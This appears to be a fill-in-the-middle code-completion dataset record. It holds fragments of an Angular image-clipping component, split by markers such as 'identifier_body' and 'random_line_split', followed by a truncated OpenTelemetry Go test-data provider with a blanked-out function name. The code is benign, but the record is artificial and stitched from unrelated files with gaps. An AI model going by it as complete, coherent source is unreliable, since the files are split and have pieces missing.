// onSetCommand(), so detectChanges() is invoked explicitly.
// NOTE(review): dereferences this.clipPath without a null check; verify
// it cannot be null when called (e.g. from onSaveImage()).
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
// Tear down any live subscriptions to avoid leaks.
ngOnDestroy() {
  if (!this.subs) return;
  for (const sub of this.subs) sub.unsubscribe();
}
}
| {
return 'ellipse(' + Math.abs(50-this.clipPath.value[0].x) + '% ' + Math.abs(50-this.clipPath.value[1].y) + '% at ' + this.clipPath.value[2].x + '% ' + this.clipPath.value[2].y + '%)';
} | identifier_body |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
setClipboxSize() {
if (!this.image) return;
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
onSetCommand(event: string) {
this.changeDetector.detach();
switch (event) {
case 'PlaceOnPage':
this.onSaveImage();
break;
case 'Back':
this.close.emit();
}
}
onSaveImage() {
if (!this.image) return;
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
this.extra = 1.07142857142;
this.refreshView(true);
this.cleanBox();
setTimeout(() => {
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
cleanBox() {
(this._handles.nativeElement as HTMLElement).setAttribute('hidden', 'true');
$(this._clipbox.nativeElement as HTMLElement).removeClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).removeClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).removeClass('inside-10');
}
restoreBox() {
this.extra = 1;
(this._handles.nativeElement as HTMLElement).removeAttribute('hidden');
$(this._clipbox.nativeElement as HTMLElement).addClass('box-shadow');
$(this._clipboard.nativeElement as HTMLElement).addClass('inside-10');
$(this._shadowboard.nativeElement as HTMLElement).addClass('inside-10');
}
onSetClipPath(event: ClipPath) {
this.clipPath = event;
if (event.type=='circle' || event.type=='ellipse' || event.type == 'svg') {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
this.setClipboxSize();
}
this.refreshView();
}
onSetOutsideClip(event: number) {
if (!this.clipPath) return;
this.clipPath.outside = event;
this.refreshView();
}
getPolygon(): string{
let result: string = '';
this.clipPath.value.forEach((v, i) => {
if (i>0)
result += ',';
result += v.x + '% ' + v.y + '%';
})
if (result != '')
result = 'polygon(' + result + ')';
return result;
}
getCircle(): string{
return 'circle(' + Math.abs(50-this.clipPath.value[0].y) + '% at ' + this.clipPath.value[1].x + '% ' + this.clipPath.value[1].y + '%)';
}
getEllipse(): string{
return 'ellipse(' + Math.abs(50-this.clipPath.value[0].x) + '% ' + Math.abs(50-this.clipPath.value[1].y) + '% at ' + this.clipPath.value[2].x + '% ' + this.clipPath.value[2].y + '%)';
}
getInset(): string{
return 'inset(' + this.clipPath.value[0].y + '% ' + (100 - this.clipPath.value[1].x) + '% ' + (100 - this.clipPath.value[2].y) + '% ' + this.clipPath.value[3].x + '%)';
}
| () {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.sanitizer.bypassSecurityTrustStyle(this.getPolygon());
case 'ellipse':
return this.sanitizer.bypassSecurityTrustStyle(this.getEllipse());
case 'circle':
return this.sanitizer.bypassSecurityTrustStyle(this.getCircle());
case 'inset':
return this.sanitizer.bypassSecurityTrustStyle(this.getInset());
case 'svg':
return 'url(#svgPath)';
}
return '';
}
getClipPath1() {
if (!this.clipPath) return '';
switch(this.clipPath.type) {
case 'polygon':
return this.getPolygon();
case 'ellipse':
return this.getEllipse();
case 'circle':
return this.getCircle();
case 'inset':
return this.getInset();
}
return '';
}
getSVGPath() {
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
result +='Z ';
return result;
}
getOpacity() {
return this.clipPath ? this.clipPath.outside : 1;
}
getXPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pWidth * p;
}
getYPosition(p: number) {
return this.clipPath.type=='svg' ? p : this.pHeight * p;
}
removalHandler(i: number) {
if (this.clipPath.type=='svg') return false;
if (this._totalHandlers < 4) return false;
return this._currentHandler == i ? true : false;
}
backgroundImage(): SafeStyle {
// this.resultImage.nativeElement.style.setProperty('background-image', imageUrl.imageUrl(this.itemContent.image));
// return this.image ? this.sanitizer.bypassSecurityTrustStyle(`url('${this.image.location + "/" + this.image.name}')`) : '';
return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
onRemoveHandler(i: number) {
this.clipPath.value.splice(i,1);
this.refreshView();
}
onDragStart(n: number, event: any) {
this._currentHandler = n;
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
onDrag(n: number, event: any) {
this.clipPath.value[n].x = this.clipPath.type=='svg' ? event.left : event.left / this.pWidth;
this.clipPath.value[n].y = this.clipPath.type=='svg' ? event.top : event.top / this.pHeight;
this.refreshView();
}
onDragEnd(n: number, event: any) {
this.refreshView();
}
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
ngOnDestroy() {
if (this.subs) {
this.subs.forEach(s => s.unsubscribe());
}
}
}
| getClipPath | identifier_name |
image-clip.component.ts | import { ViewChild, Component, ElementRef, ChangeDetectorRef, SimpleChanges, AfterViewInit,
OnInit, OnChanges, OnDestroy, Input, Output, EventEmitter
} from '@angular/core';
import { HttpEventType } from '@angular/common/http';
import { DomSanitizer, SafeStyle } from '@angular/platform-browser';
import * as Rx from 'rxjs/Rx';
import * as lodash from 'lodash';
import * as domtoimage from 'dom-to-image';
import * as html2canvas from "html2canvas";
import { LoadingComponent } from '@app-ui/loading/loading.component';
import { ImagePath, ClipPath } from '@app/models';
import { AppService } from '@app/app.service';
import { UUID } from '@app-lib/uuid/uuid.service';
import * as imageUrl from '@app-lib/functions/image-url';
// ----------------------------------------------------------------
// Component
// ----------------------------------------------------------------
@Component({
moduleId : module.id,
selector : 'image-clip',
templateUrl: './image-clip.component.html',
styleUrls: [
'./image-clip.component.css',
]
})
export class ImageClipComponent implements OnInit, OnChanges, OnDestroy {
@Input() image: ImagePath = null;
@Output() placeOnPage = new EventEmitter<ImagePath>();
@Output() close = new EventEmitter<void>();
@ViewChild('clipbox') public _clipbox: ElementRef;
get clipboxElem(): HTMLElement { return (this._clipbox.nativeElement as HTMLElement); }
@ViewChild(LoadingComponent) loadingComponent: LoadingComponent;
@ViewChild('shadowboard') public _shadowboard: ElementRef;
@ViewChild('clipboard') public _clipboard: ElementRef;
@ViewChild('clipboardPath') public _clipboardPath: ElementRef;
@ViewChild('handles') public _handles: ElementRef;
public clipPath: ClipPath = null;
public _currentHandler: number = -1;
public _totalHandlers: number = 0;
public _loading: boolean = false;
private pWidth: number = 2.8; // (300 - 20) / 100
private pHeight: number = 2.8;
private extra: number = 1;
private subs: Rx.Subscription[] = [];
constructor(
private changeDetector: ChangeDetectorRef,
public elementRef: ElementRef,
private sanitizer: DomSanitizer,
private appService: AppService
) { }
ngOnInit() {
if (this.image)
this.setClipboxSize();
}
ngOnChanges(changes: SimpleChanges) {
if (changes['image'] && changes['image'].currentValue)
this.setClipboxSize();
}
setClipboxSize() {
if (!this.image) return;
if (this.clipPath && (this.clipPath.type == 'circle' || this.clipPath.type == 'ellipse')) {
this.pHeight = 2.8;
this.pWidth = 2.8;
}
else {
let width = 880;
let height = 480;
let img = new Image;
img.src = this.image.location + '/' + this.image.name;
let imgHeight = img.height;
let imgWidth = img.width;
if ( imgWidth > width) {
imgHeight = imgHeight * (width / imgWidth);
imgWidth = width;
}
if (imgHeight > height) {
imgWidth = imgWidth * (height / imgHeight);
imgHeight = height;
}
this.pHeight = imgHeight / 100;
this.pWidth = imgWidth / 100;
}
}
onSetCommand(event: string) {
this.changeDetector.detach();
switch (event) {
case 'PlaceOnPage':
this.onSaveImage();
break;
case 'Back':
this.close.emit();
}
}
// Renders the clipped image region to a PNG (via dom-to-image), uploads it,
// and emits the uploaded image path through placeOnPage so the parent can
// place it on the page. The host element is CSS-disabled for the duration.
onSaveImage() {
if (!this.image) return;
// Block interaction on the surrounding container while rendering/uploading.
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).addClass('disable');
// Export-time scale factor consumed by getSVGPath(); presumably compensates
// for the removed 'inside-10' padding — TODO confirm.
this.extra = 1.07142857142;
this.refreshView(true);
// Strip handles/shadows/padding so they don't appear in the rendered PNG.
this.cleanBox();
// Defer rendering a tick, presumably so the cleaned-up DOM is painted first
// — confirm.
setTimeout(() => {
// Dead html2canvas-based alternative kept for reference.
// html2canvas(this.clipboxElem, {
// allowTaint: false,
// useCORS: true,
// logging: false,
// imageTimeout: 0,
// backgroundColor: "#FFFFFF",
// // scale: scale
// })
// .then(canvas => {
// let dataImage = canvas.toDataURL("image/jpeg", 0.92); //image/png
// // let dataImage = canvas.toDataURL('image/png'); //image/png
// let imageFile = this.appService.dataURLtoFile(
// dataImage,
// this.image.name + '_clip_' + UUID.UUID() + '.png'
// );
domtoimage.toPng(this.clipboxElem)
.then((dataURL: any) => {
// Wrap the data URL into a uniquely named file and upload it.
const imageFile = this.appService.dataURLtoFile(dataURL, decodeURIComponent(this.image.name) + '-clip' + UUID.UUID() + '.png');
this.appService.uploadImages([imageFile]).subscribe(
event => {
switch (event.type) {
case HttpEventType.Sent:
// console.log(`Uploading file "${index}" of size ${f.size}.`);
break;
case HttpEventType.UploadProgress:
// Cap reported progress at 98% until the server responds.
if (this.loadingComponent)
this.loadingComponent.set(Math.min(event.loaded / event.total * 100, 98));
break;
case HttpEventType.Response:
if (this.loadingComponent)
this.loadingComponent.complete();
const tuid = lodash.get(event, 'body.tuid');
const img = lodash.get(event, ['body', 'urls', 0]);
if (tuid) {
localStorage.setItem('tuid', lodash.get(event, 'body.tuid'));
}
if (img) {
this.placeOnPage.emit(img as ImagePath);
}
break;
// default:
// console.log(`File "${index}" surprising upload event: ${event.type}.`);
}
},
error => {
console.log(error);
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
// this.alertService.playToast('Failed', `There is an error while uploading ${f.name}. Try again`, 1);
},
() => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
}
);
})
// NOTE(review): restoreBox() runs only on the dom-to-image failure path;
// the upload success and upload-error paths leave the box in its
// "cleaned" state — confirm this is intended.
.catch((error: any) => {
$((this.elementRef.nativeElement as HTMLElement).parentElement.parentElement).removeClass('disable');
this.restoreBox();
console.error('oops, something went wrong!', error);
});
});
}
cleanBox() {
  // Strip the editing chrome (handles, shadow, padding) before rendering the
  // clip box to an image.
  (this._handles.nativeElement as HTMLElement).setAttribute('hidden', 'true');
  $(this._clipbox.nativeElement as HTMLElement).removeClass('box-shadow');
  for (const board of [this._clipboard, this._shadowboard]) {
    $(board.nativeElement as HTMLElement).removeClass('inside-10');
  }
}
restoreBox() {
  // Undo cleanBox(): reset the export scale and bring back handles, shadow
  // and padding.
  this.extra = 1;
  (this._handles.nativeElement as HTMLElement).removeAttribute('hidden');
  $(this._clipbox.nativeElement as HTMLElement).addClass('box-shadow');
  for (const board of [this._clipboard, this._shadowboard]) {
    $(board.nativeElement as HTMLElement).addClass('inside-10');
  }
}
onSetClipPath(event: ClipPath) {
  // Adopt the newly selected clip shape and reset the working area.
  this.clipPath = event;
  const fixedArea =
    event.type == 'circle' || event.type == 'ellipse' || event.type == 'svg';
  if (fixedArea) {
    // These shapes are edited in a fixed square working area.
    this.pHeight = 2.8;
    this.pWidth = 2.8;
  } else {
    this.setClipboxSize();
  }
  this.refreshView();
}
onSetOutsideClip(outside: number) {
  // Update the opacity applied outside the clip region; no-op without a clip.
  if (!this.clipPath) {
    return;
  }
  this.clipPath.outside = outside;
  this.refreshView();
}
getPolygon(): string {
  // Build "polygon(x1% y1%,x2% y2%,...)" from the handle coordinates;
  // returns '' when there are no handles.
  const points = this.clipPath.value.map((v) => `${v.x}% ${v.y}%`);
  return points.length > 0 ? `polygon(${points.join(',')})` : '';
}
getCircle(): string {
  // circle(r% at cx% cy%): value[0].y encodes the radius relative to the
  // 50% midline, value[1] is the centre handle.
  const [edge, centre] = this.clipPath.value;
  return `circle(${Math.abs(50 - edge.y)}% at ${centre.x}% ${centre.y}%)`;
}
getEllipse(): string {
  // ellipse(rx% ry% at cx% cy%): value[0].x and value[1].y encode the radii
  // relative to the 50% midlines, value[2] is the centre handle.
  const v = this.clipPath.value;
  return `ellipse(${Math.abs(50 - v[0].x)}% ${Math.abs(50 - v[1].y)}% at ${v[2].x}% ${v[2].y}%)`;
}
getInset(): string {
  // inset(top% right% bottom% left%) derived from the four edge handles.
  const v = this.clipPath.value;
  const top = v[0].y;
  const right = 100 - v[1].x;
  const bottom = 100 - v[2].y;
  const left = v[3].x;
  return `inset(${top}% ${right}% ${bottom}% ${left}%)`;
}
getClipPath() {
  // Sanitized clip-path style value for the current shape ('' when no clip
  // is active or the type is unknown).
  if (!this.clipPath) return '';
  switch (this.clipPath.type) {
    case 'svg':
      // SVG shapes reference the inline <clipPath id="svgPath"> element.
      return 'url(#svgPath)';
    case 'polygon':
      return this.sanitizer.bypassSecurityTrustStyle(this.getPolygon());
    case 'circle':
      return this.sanitizer.bypassSecurityTrustStyle(this.getCircle());
    case 'ellipse':
      return this.sanitizer.bypassSecurityTrustStyle(this.getEllipse());
    case 'inset':
      return this.sanitizer.bypassSecurityTrustStyle(this.getInset());
    default:
      return '';
  }
}
getClipPath1() {
  // Raw (unsanitized) clip-path CSS string; SVG shapes yield '' here because
  // they are handled via the inline <clipPath> element instead.
  if (!this.clipPath) return '';
  const builders: { [type: string]: () => string } = {
    polygon: () => this.getPolygon(),
    ellipse: () => this.getEllipse(),
    circle: () => this.getCircle(),
    inset: () => this.getInset(),
  };
  const build = builders[this.clipPath.type];
  return build ? build() : '';
}
// Builds an SVG path string ("M x0 y0 C ... C ... C ... Z") from the nine
// clip handles, scaled by this.extra (the export-time scale factor).
getSVGPath() {
// p maps each row of three entries onto the handle indices of one cubic
// 'C' segment; the path starts at handle 0.
// NOTE(review): the last segment reuses handles 7, 1 and 0 — confirm that
// ending on handle 0 (the start point) before 'Z' is intended.
let p =[1,2,3,4,5,6,7,1,0];
let result = 'M ' + (this.extra * this.clipPath.value[0].x) + ' ' + (this.extra * this.clipPath.value[0].y) + ' ';
for(let i = 0; i < 3; i++) {
result += 'C ';
for(let j = 0; j < 3; j++) {
result += (this.extra * this.clipPath.value[p[i*3 + j]].x) + ' ' + (this.extra * this.clipPath.value[p[i*3 + j]].y) + ' ';
}
}
// Close the path back to the starting point.
result +='Z ';
return result;
}
getOpacity() {
  // Opacity applied outside the clip region; fully opaque when no clip is set.
  if (!this.clipPath) return 1;
  return this.clipPath.outside;
}
getXPosition(p: number) {
  // SVG handles use raw coordinates; other shapes scale by the box width factor.
  if (this.clipPath.type === 'svg') return p;
  return this.pWidth * p;
}
getYPosition(p: number) {
  // SVG handles use raw coordinates; other shapes scale by the box height factor.
  if (this.clipPath.type === 'svg') return p;
  return this.pHeight * p;
}
removalHandler(i: number) {
  // A handle shows its removal affordance only when it is the active
  // (recently dragged) handle, never on SVG shapes, and only while at least
  // 4 handles remain.
  if (this.clipPath.type === 'svg') return false;
  if (this._totalHandlers < 4) return false;
  // Idiom fix: strict equality and no redundant `? true : false` ternary.
  return this._currentHandler === i;
}
backgroundImage(): SafeStyle {
  // Trusted CSS background-image value built from the component's image.
  return this.sanitizer.bypassSecurityTrustStyle(imageUrl.imageUrl(this.image));
}
onRemoveHandler(i: number) {
  // Drop the i-th clip handle and re-render the shape.
  this.clipPath.value.splice(i, 1);
  this.refreshView();
}
// Marks handle n as the active handle; the flag auto-clears after 2s so the
// removal affordance disappears when the user stops interacting.
onDragStart(n: number, event: any) {
this._currentHandler = n;
// NOTE(review): starting a new drag does not cancel the previous timer, so
// an earlier timeout can clear a newer selection early — confirm intended.
setTimeout(() => {
this._currentHandler = -1;
this.refreshView();
}, 2000);
}
onDrag(n: number, event: any) {
  // Convert the dragged pixel position back into clip-path coordinates
  // (SVG shapes use raw coordinates, others divide out the scale factors).
  const isSvg = this.clipPath.type === 'svg';
  this.clipPath.value[n].x = isSvg ? event.left : event.left / this.pWidth;
  this.clipPath.value[n].y = isSvg ? event.top : event.top / this.pHeight;
  this.refreshView();
}
// Final refresh once a handle drag completes.
onDragEnd(n: number, event: any) {
this.refreshView();
}
// Manually runs change detection (the detector is detached in
// onSetCommand), refreshing the loading flag and handle count used by the
// template.
refreshView(loading: boolean = false) {
this._loading = loading;
this._totalHandlers = this.clipPath.value.length;
this.changeDetector.detectChanges();
}
| ngOnDestroy() {
if (this.subs) {
this.subs.forEach(s => s.unsubscribe());
}
}
} | random_line_split | |
data_providers.go | // Copyright The OpenTelemetry Authors
// SPDX-License-Identifier: Apache-2.0
package testbed // import "github.com/open-telemetry/opentelemetry-collector-contrib/testbed/testbed"
import (
	"fmt"
	"log"
	"strconv"
	"sync/atomic"
	"time"

	"go.opentelemetry.io/collector/component"
	"go.opentelemetry.io/collector/pdata/pcommon"
	"go.opentelemetry.io/collector/pdata/plog"
	"go.opentelemetry.io/collector/pdata/pmetric"
	"go.opentelemetry.io/collector/pdata/ptrace"

	"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/golden"
	"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/goldendataset"
	"github.com/open-telemetry/opentelemetry-collector-contrib/internal/coreinternal/idutils"
)
// DataProvider defines the interface for generators of test data used to drive various end-to-end tests.
// The bool returned by each Generate* method reports exhaustion: true means
// the provider has no further data (see goldenDataProvider); perpetual
// providers (perf, file) always return false.
type DataProvider interface {
// SetLoadGeneratorCounters supplies pointers to LoadGenerator counters.
// The data provider implementation should increment these as it generates data.
SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64)
// GenerateTraces returns an internal Traces instance with an OTLP ResourceSpans slice populated with test data.
GenerateTraces() (ptrace.Traces, bool)
// GenerateMetrics returns an internal MetricData instance with an OTLP ResourceMetrics slice of test data.
GenerateMetrics() (pmetric.Metrics, bool)
// GenerateLogs returns the internal plog.Logs format
GenerateLogs() (plog.Logs, bool)
}
// perfTestDataProvider in an implementation of the DataProvider for use in performance tests.
// Tracing IDs are based on the incremented batch and data items counters.
type perfTestDataProvider struct {
options LoadOptions
// traceIDSequence also serves as the batch counter for GenerateMetrics and
// GenerateLogs.
traceIDSequence atomic.Uint64
// dataItemsGenerated is owned by the LoadGenerator; wired in through
// SetLoadGeneratorCounters.
dataItemsGenerated *atomic.Uint64
}
// NewPerfTestDataProvider creates an instance of perfTestDataProvider which generates test data based on the sizes
// specified in the supplied LoadOptions.
func NewPerfTestDataProvider(options LoadOptions) DataProvider {
	dp := &perfTestDataProvider{options: options}
	return dp
}
func (dp *perfTestDataProvider) | (dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
// GenerateTraces builds one batch of ItemsPerBatch synthetic client spans.
// Span and trace IDs are derived from the monotonically increasing counters,
// so every generated span is unique. Always returns false (never exhausts).
func (dp *perfTestDataProvider) GenerateTraces() (ptrace.Traces, bool) {
traceData := ptrace.NewTraces()
spans := traceData.ResourceSpans().AppendEmpty().ScopeSpans().AppendEmpty().Spans()
spans.EnsureCapacity(dp.options.ItemsPerBatch)
traceID := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
// Spread start times so spans within and across batches do not collide.
startTime := time.Now().Add(time.Duration(i+int(traceID)*1000) * time.Second)
endTime := startTime.Add(time.Millisecond)
spanID := dp.dataItemsGenerated.Add(1)
span := spans.AppendEmpty()
// Create a span.
span.SetTraceID(idutils.UInt64ToTraceID(0, traceID))
span.SetSpanID(idutils.UInt64ToSpanID(spanID))
span.SetName("load-generator-span" + strconv.FormatUint(spanID+traceID*1000, 10))
span.SetKind(ptrace.SpanKindClient)
attrs := span.Attributes()
attrs.PutInt("load_generator.span_seq_num", int64(spanID))
attrs.PutInt("load_generator.trace_seq_num", int64(traceID))
// Additional attributes.
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
span.SetStartTimestamp(pcommon.NewTimestampFromTime(startTime))
span.SetEndTimestamp(pcommon.NewTimestampFromTime(endTime))
}
return traceData, false
}
// GenerateMetrics builds one batch of ItemsPerBatch gauge metrics with 7 data
// points each; point values come from the shared item counter. Always returns
// false (never exhausts).
// NOTE(review): only the metric description is set, never the metric name —
// confirm intended.
func (dp *perfTestDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
// Generate 7 data points per metric.
const dataPointsPerMetric = 7
md := pmetric.NewMetrics()
rm := md.ResourceMetrics().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rm.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
metrics := rm.ScopeMetrics().AppendEmpty().Metrics()
metrics.EnsureCapacity(dp.options.ItemsPerBatch)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
metric := metrics.AppendEmpty()
metric.SetDescription("Load Generator Counter #" + strconv.Itoa(i))
metric.SetUnit("1")
dps := metric.SetEmptyGauge().DataPoints()
// traceIDSequence doubles as a per-metric batch counter here.
batchIndex := dp.traceIDSequence.Add(1)
// Generate data points for the metric.
dps.EnsureCapacity(dataPointsPerMetric)
for j := 0; j < dataPointsPerMetric; j++ {
dataPoint := dps.AppendEmpty()
dataPoint.SetStartTimestamp(pcommon.NewTimestampFromTime(time.Now()))
value := dp.dataItemsGenerated.Add(1)
dataPoint.SetIntValue(int64(value))
dataPoint.Attributes().PutStr("item_index", "item_"+strconv.Itoa(j))
dataPoint.Attributes().PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
}
}
return md, false
}
// GenerateLogs builds one batch of ItemsPerBatch INFO3 log records, all
// stamped with the same timestamp and batch index. Always returns false
// (never exhausts).
func (dp *perfTestDataProvider) GenerateLogs() (plog.Logs, bool) {
logs := plog.NewLogs()
rl := logs.ResourceLogs().AppendEmpty()
if dp.options.Attributes != nil {
attrs := rl.Resource().Attributes()
attrs.EnsureCapacity(len(dp.options.Attributes))
for k, v := range dp.options.Attributes {
attrs.PutStr(k, v)
}
}
logRecords := rl.ScopeLogs().AppendEmpty().LogRecords()
logRecords.EnsureCapacity(dp.options.ItemsPerBatch)
now := pcommon.NewTimestampFromTime(time.Now())
// traceIDSequence doubles as the batch counter for log batches.
batchIndex := dp.traceIDSequence.Add(1)
for i := 0; i < dp.options.ItemsPerBatch; i++ {
itemIndex := dp.dataItemsGenerated.Add(1)
record := logRecords.AppendEmpty()
record.SetSeverityNumber(plog.SeverityNumberInfo3)
record.SetSeverityText("INFO3")
record.Body().SetStr("Load Generator Counter #" + strconv.Itoa(i))
record.SetFlags(plog.DefaultLogRecordFlags.WithIsSampled(true))
record.SetTimestamp(now)
attrs := record.Attributes()
attrs.PutStr("batch_index", "batch_"+strconv.Itoa(int(batchIndex)))
attrs.PutStr("item_index", "item_"+strconv.Itoa(int(itemIndex)))
// Fixed attributes of every value type, exercising attribute handling.
attrs.PutStr("a", "test")
attrs.PutDouble("b", 5.0)
attrs.PutInt("c", 3)
attrs.PutBool("d", true)
}
return logs, false
}
// goldenDataProvider is an implementation of DataProvider for use in correctness tests.
// Provided data from the "Golden" dataset generated using pairwise combinatorial testing techniques.
type goldenDataProvider struct {
tracePairsFile string
spanPairsFile string
dataItemsGenerated *atomic.Uint64
// tracesGenerated caches the lazily generated dataset; tracesIndex is the
// read cursor into it.
tracesGenerated []ptrace.Traces
tracesIndex int
metricPairsFile string
// metricsGenerated/metricsIndex mirror the trace cache for metrics.
metricsGenerated []pmetric.Metrics
metricsIndex int
}
// NewGoldenDataProvider creates a new instance of goldenDataProvider which generates test data based
// on the pairwise combinations specified in the tracePairsFile and spanPairsFile input variables.
func NewGoldenDataProvider(tracePairsFile string, spanPairsFile string, metricPairsFile string) DataProvider {
	dp := &goldenDataProvider{}
	dp.tracePairsFile = tracePairsFile
	dp.spanPairsFile = spanPairsFile
	dp.metricPairsFile = metricPairsFile
	return dp
}
// SetLoadGeneratorCounters stores the LoadGenerator-owned item counter that
// the Generate* methods increment.
func (dp *goldenDataProvider) SetLoadGeneratorCounters(dataItemsGenerated *atomic.Uint64) {
dp.dataItemsGenerated = dataItemsGenerated
}
// GenerateTraces returns the next pre-generated golden trace batch; the bool
// result is true once the dataset is exhausted (or generation failed).
func (dp *goldenDataProvider) GenerateTraces() (ptrace.Traces, bool) {
	if dp.tracesGenerated == nil {
		var err error
		dp.tracesGenerated, err = goldendataset.GenerateTraces(dp.tracePairsFile, dp.spanPairsFile)
		if err != nil {
			log.Printf("cannot generate traces: %s", err)
			// BUG FIX: the original reset tracesGenerated to nil here, which
			// made every subsequent call retry generation and re-log the same
			// error. Keep a non-nil empty slice so the failure is sticky.
			dp.tracesGenerated = []ptrace.Traces{}
		}
	}
	if dp.tracesIndex >= len(dp.tracesGenerated) {
		return ptrace.NewTraces(), true
	}
	td := dp.tracesGenerated[dp.tracesIndex]
	dp.tracesIndex++
	dp.dataItemsGenerated.Add(uint64(td.SpanCount()))
	return td, false
}
// GenerateMetrics returns the next pre-generated golden metrics batch; the
// bool result is true once the dataset is exhausted (or generation failed).
func (dp *goldenDataProvider) GenerateMetrics() (pmetric.Metrics, bool) {
	if dp.metricsGenerated == nil {
		var err error
